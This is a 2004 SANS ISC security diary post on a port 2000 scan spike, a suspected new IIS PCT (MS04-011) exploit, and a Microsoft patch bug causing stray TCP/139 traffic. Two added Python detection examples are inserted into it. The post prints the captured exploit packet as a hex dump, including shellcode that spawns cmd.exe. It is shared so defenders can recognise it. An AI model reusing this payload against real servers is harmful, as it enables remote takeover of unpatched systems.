SANS ISC InfoSec Handlers Diary Blog

Port 2000 spike; New IIS PCT exploit?; Following the bouncing MS patches

Published: 2004-10-25
Last Updated: 2004-10-25 23:13:52 UTC
by Kyle Haugsness (Version: 1)
0 comment(s)
Port 2000 spike

There is a significant increase in port 2000 activity. Given the number
of targets, this appears to be general sweeping rather than targeted
activity. At this point, we don't have a good feel for what is causing
the increase. If you have packet captures, please send them along.

http://isc.sans.org/port_details.php?port=2000

New IIS PCT exploit in the wild?

We received a report that a possibly new IIS PCT exploit (for MS04-011)
is being used in the wild. Exploit code for this vulnerability has been
known to exist since at least April 2004, so this is NOT a new
vulnerability. The packet capture below appears to have 25 extra bytes
beginning at offset 0x0E0. At this time we have not been able to
determine whether this is a completely new exploit, but it should be
identified by most IDS signatures given the obvious strings
"THCOWNZIIS!" and "cmd.exe", which were also in the original exploit
code.



000 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
010 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
020 BE 98 EB 25 96 AA 46 DA 69 4E 02 06 6C 59 6C 59 ...%..F.iN..lYlY
030 F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
040 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
050 ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
060 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
070 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
080 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
090 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
0A0 E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
0B0 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
0C0 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
0D0 FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
0E0 50 8B 45 04 35 93 93 93 93 89 45 04 66 8B 45 02 P.E.5.....E.f.E.
0F0 66 35 93 93 66 89 45 02 58 89 CE 31 DB 53 53 53 f5..f.E.X..1.SSS
100 53 56 46 56 FF D0 89 C7 55 58 66 89 30 6A 10 55 SVFV....UXf.0j.U
110 57 FF 55 E0 8D 45 88 50 FF 55 E8 55 55 FF 55 EC W.U..E.P.U.UU.U.
120 8D 44 05 0C 94 53 68 2E 65 78 65 68 5C 63 6D 64 .D...Sh.exeh\cmd
130 94 31 D2 8D 45 CC 94 57 57 57 53 53 FE CA 01 F2 .1..E..WWWSS....
140 52 94 8D 45 78 50 8D 45 88 50 B1 08 53 53 6A 10 R..ExP.E.P..SSj.
150 FE CE 52 53 53 53 55 FF 55 F0 6A FF FF 55 E4 ..RSSSU.U.j..U.
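As an added example (not code from the diary), the following Python reassembles the dump format above and checks the bytes for the indicator strings named in the text; only the dump lines needed for the check are embedded. Note that at offset 0x120 the bytes carry "cmd.exe" as the two push operands ".exe" and "\cmd", so the check looks for both fragments rather than the literal string.

```python
import re

# Added example (not from the ISC diary): reassemble the diary's dump format
# and check the bytes for the indicator strings the diary names. Only the
# dump lines needed for the check are embedded; the full capture is above.
DUMP_LINES = """\
000 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
010 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
120 8D 44 05 0C 94 53 68 2E 65 78 65 68 5C 63 6D 64 .D...Sh.exeh\\cmd
"""

# Offset, then up to 16 hex bytes; the ASCII column is not used. A short
# final line whose ASCII column begins with two hex-like characters would
# be misread, which is acceptable for dumps laid out as on this page.
HEX_LINE = re.compile(r"^\s*([0-9A-Fa-f]{3})((?:\s+[0-9A-Fa-f]{2}){1,16})")

# "cmd.exe" is not contiguous on the wire: at 0x120 the name is pushed as the
# two 4-byte operands ".exe" and "\cmd", so a literal match would miss it and
# both fragments are required instead.
INDICATORS = {
    "THCOWNZIIS!": [b"THCOWNZIIS!"],
    "cmd.exe (as push fragments)": [b".exe", b"\\cmd"],
}


def parse_dump(text: str) -> bytes:
    """Place each line's bytes at its stated offset, zero-filling any gap."""
    out = bytearray()
    for line in text.splitlines():
        m = HEX_LINE.match(line)
        if not m:
            continue
        offset = int(m.group(1), 16)
        data = bytes.fromhex(m.group(2).replace(" ", ""))
        if len(out) < offset + len(data):
            out.extend(b"\x00" * (offset + len(data) - len(out)))
        out[offset:offset + len(data)] = data
    return bytes(out)


def find_indicators(payload: bytes) -> dict:
    """Return {indicator: [offset per fragment]} for indicators fully present."""
    hits = {}
    for name, fragments in INDICATORS.items():
        offsets = [payload.find(f) for f in fragments]
        if all(o >= 0 for o in offsets):
            hits[name] = offsets
    return hits
```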


Following the bouncing MS patches

While Tom Liston is busy working on the next installment of "bouncing
malware", here is an interesting story about misbehaving software.


Several weeks ago, a concerned reader submitted an interesting case to
ISC suspecting a new virus or system compromise. Harpal Parmar reported
that a Windows 2000 server running SP4 and fully patched was sending
unsolicited packets outbound to specific addresses in the IP range:
128.x.x.x -- 136.x.x.x.


The server was sending normal TCP packets to random destination hosts
in the above range on TCP port 139 every 10 minutes. Fortunately,
Harpal had outbound filtering in place, so the packets never reached
their destination. Receiving no response, the server would retransmit
the TCP segments using TCP's normal backoff timing (3, 6, and 12 second
intervals).


ISC handlers reviewed a packet capture provided by Harpal and found no
evidence of malware or system compromise. After running several
different virus scanners and finding no malware, Harpal looked for
other explanations for the traffic. The first step was to rebuild the
server offline and monitor for outbound traffic. After applying a
specific patch, MS04-011 (KB835732), the activity started again. An
engineer at Microsoft investigated and confirmed that this patch was
the source of the problem. Microsoft provided another patch that
corrected it.


Apparently, the operating system was looking for the SYSVOL$ folder on a
domain controller, and a bug caused the IP address to be read from
random memory addresses.


Specific symptoms experienced:

o Windows 2000 SP4

o Dual processor machine (x86)

o IIS installed/enabled

o File and printer sharing disabled

o Outbound connections to TCP port 139 every 10 minutes in IP range: 128.x.x.x -- 136.x.x.x
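As an added example (not from the diary), this Python flags the symptom above in a constructed outbound-filter log: TCP/139 attempts into 128.x.x.x -- 136.x.x.x, collapsed together with their 3/6/12-second retransmits, that recur about every 10 minutes from the same source. The log format (epoch seconds, source, destination, port, action) is an assumption.

```python
from ipaddress import IPv4Address

# Added example (not from the ISC diary): detect the symptom described above,
# outbound TCP/139 attempts to 128.x.x.x-136.x.x.x about every 10 minutes, each
# followed by TCP's 3/6/12-second retransmits. The log format is a constructed
# one: epoch seconds, source, destination, destination port, action.
RANGE_LOW, RANGE_HIGH = IPv4Address("128.0.0.0"), IPv4Address("136.255.255.255")
PERIOD, TOLERANCE = 600, 30      # expected cadence and allowed jitter (seconds)
RETRANSMIT_WINDOW = 25           # 3 + 6 + 12 s of backoff fits inside this

# Constructed outbound-filter log: three attempts 600 s apart with retransmits,
# plus one unrelated allowed connection that must not count.
SAMPLE_LOG = """\
1098700000 10.1.1.5 130.14.2.9 139 DROP
1098700003 10.1.1.5 130.14.2.9 139 DROP
1098700009 10.1.1.5 130.14.2.9 139 DROP
1098700021 10.1.1.5 130.14.2.9 139 DROP
1098700600 10.1.1.5 133.200.7.1 139 DROP
1098700603 10.1.1.5 133.200.7.1 139 DROP
1098700700 10.1.1.5 192.168.4.4 445 ALLOW
1098701200 10.1.1.5 128.9.9.9 139 DROP
1098701203 10.1.1.5 128.9.9.9 139 DROP
"""


def attempts(log: str) -> list:
    """Collapse each SYN and its retransmits into one (first_ts, src, dst)."""
    result = []
    for line in log.splitlines():
        ts, src, dst, dport, _action = line.split()
        if dport != "139" or not RANGE_LOW <= IPv4Address(dst) <= RANGE_HIGH:
            continue
        ts = int(ts)
        last = result[-1] if result else None
        if last and last[1:] == (src, dst) and ts - last[0] <= RETRANSMIT_WINDOW:
            continue  # retransmit of an attempt already recorded
        result.append((ts, src, dst))
    return result


def periodic_sources(log: str) -> list:
    """Return sources whose successive in-range TCP/139 attempts are ~PERIOD apart."""
    times_by_src = {}
    for ts, src, _dst in attempts(log):
        times_by_src.setdefault(src, []).append(ts)
    flagged = []
    for src, times in times_by_src.items():
        gaps = [b - a for a, b in zip(times, times[1:])]
        if gaps and all(abs(g - PERIOD) <= TOLERANCE for g in gaps):
            flagged.append(src)
    return flagged
```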


Resolution:

o Problem caused by application of MS04-011 (KB835732)

o Problem fixed by workaround or patch available at:

http://support.microsoft.com/default.aspx?scid=kb;en-us;842638

Follow-up on Fake RedHat Advisory

The k-otik folks have an analysis of the bad things that might happen
if you follow the instructions in the fake RedHat advisory that was
reported in yesterday's diary:
http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt

Follow-up on how to identify "normal" processes on Windows

A couple of additional URLs that may be useful when trying to
identify good/bad processes in Windows. Please note that these sites
are hosted by companies with commercial products; this is not an
endorsement of any commercial product by SANS or the Internet Storm
Center (isn't it fun to be politically correct?).

http://answersthatwork.com/Tasklist_pages/tasklist.htm

http://www.liutilities.com/products/wintaskspro/processlibrary/
